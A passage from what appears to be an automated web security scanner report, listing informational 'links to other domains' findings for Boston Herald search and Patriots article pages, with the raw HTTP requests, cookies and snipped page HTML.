Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

   <link rel="alternate" title="Site Search - - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/search/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsearch%2F%3Ftopic%3DRep.%2BJames%2BVallee%26searchSite%3Drecent&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110128/stp/fbd318_ltpDeleoA012811.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1312665&format=comments">
...[SNIP]...
</a>&nbsp;&nbsp;

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniSidebar.gif" alt="More Information" style="margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1312665">
...[SNIP]...
<a id="trackMainImage_href" href="/news/politics/view.bg?articleid=1312665">
<img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/fbd318_ltpDeleoA012811.jpg" title="House Speaker Robert DeLeo is seen in this Tuesday, August 3, 2010 file photo." alt="House Speaker Robert DeLeo is seen in this Tuesday, August 3, 2010 file photo.">
</a>
...[SNIP]...
itics/view.bg?articleid=1312665" title="Speaker DeLeo shakes up House"
onclick="switchPhoto('198223');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198223" src="http://multimedia.heraldinteractive.com/images/20110128/stp/fbd318_ltpDeleoA012811.jpg" title="House Speaker Robert DeLeo is seen in this Tuesday, August 3, 2010 file photo."
alt="Nancy Lane" style="margin:0 2px" />

</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.299. http://www.bostonherald.com/search/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /search/

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /search/?topic=scholz&searchSite=recent&x=0&y=0 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:06:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 33100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

   <link rel="alternate" title="Site Search - - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/search/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsearch%2F%3Ftopic%3Dscholz%26searchSite%3Drecent%26x%3D0%26y%3D0&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<div><a href="http://tinyurl.com/385v42j">Scholz v. Barry Goudreau (PDF)</a>
...[SNIP]...
<div><a href="http://tinyurl.com/3xyku7b">Scholz v. Anthony Cosmo (PDF)</a>
...[SNIP]...
<div><a href="http://tinyurl.com/32m5o2e">Scholz v. Micki Delp, Connie Goudreau and Jane Doe (PDF)</a>
...[SNIP]...
<div><a href="http://tinyurl.com/38kak56">Scholz v. Gouldsmith (PDF)</a>
...[SNIP]...
<div><a href="http://tinyurl.com/3xp9usp">Scholz v. a female acquaintance (PDF)</a>
...[SNIP]...
<div><a href="http://tinyurl.com/24azdh8">Herald.s Motion to Transfer, including Micki Delp deposition (PDF)</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.300. http://www.bostonherald.com/sports/football/patriots/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/football/patriots/view.bg

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /sports/football/patriots/view.bg?articleid=1312522&srvc=home&position=active HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:53:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 48285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<meta name="PUBDATE" content="Friday, January 28, 2011" />

   <link rel="alternate" title="N.E. Patriots - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/sports/football/patriots/" type="application/rss+xml">

   <script type="text/javascript" language="JavaScript">
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsports%2Ffootball%2Fpatriots%2Fview.bg%3Farticleid%3D1312522%26srvc%3Dsports%26position%3D2&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<div id="bylineArea">
                                        <img class="bylineImage" src="http://cache.heraldinteractive.com/images/siteImages/reporters/karen_guregian.gif?1=1" alt="Karen Guregian" />
                                       <span class="bold">
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1312522&amp;format=email"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif"
       alt="Email" />
E-mail</a>
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1312522&amp;format=text"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif"
       alt="Printable" />
Print</a>
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1312522&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
       alt="Comments" />
(24) Comments</a>
...[SNIP]...
<a href="#" onclick="textsize('up');return false" title="Increase font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif" alt="Larger" /></a><a href="#" onclick="textsize('down');return false" title="Decrease font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif" alt="Smaller" /></a>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Brandon Meriweather won&rsquo;t be bothered by naysayers');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<font color="#888888"> [<a href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/team.aspx?id=077" >team stats</a>
...[SNIP]...
<font color="#888888"> [<a href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/080/team.aspx?id=080" >team stats</a>
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1312522&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />
(24) Comments&nbsp;&nbsp;|&nbsp;&nbsp;Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:none">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif">&nbsp;<b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/c68b4a_brand_01282011.jpg" alt="
PROVING HE BELONGS: Some maligned..." />
</div>
...[SNIP]...
<a href="/sports/football/patriots/view/20110128belichick_marks_pats_milestone/"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/85bc2c_bill_01282011.jpg" alt="Bill Belichick marks Patriots&rsquo; milestone" /></a>
...[SNIP]...
<a href="/sports/football/patriots/view/20110128castonzo_follows_lead_blockers/"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/83f74d_bc_01282011.jpg" alt="Anthony Castonzo follows lead blockers" /></a>
...[SNIP]...
<a href="/sports/football/patriots/view/20110128shadowy_observations_pats_gm_caserio_is_mystery_man/"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/6666ca_tom_01282011.jpg" alt="Nick Caserio is a Patriots mystery man" /></a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.301. http://www.bostonherald.com/sports/football/patriots/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/football/patriots/view.bg

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /sports/football/patriots/view.bg?articleid=1312690&pos=breaking HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:53:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<meta name="PUBDATE" content="Friday, January 28, 2011" />

   <link rel="alternate" title="N.E. Patriots - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/sports/football/patriots/" type="application/rss+xml">

   <script type="text/javascript" language="JavaScript">
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsports%2Ffootball%2Fpatriots%2Fview%2F20110128mankins_believes_pats_days_are_over%2Fsrvc%3Dhome%26position%3D0&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
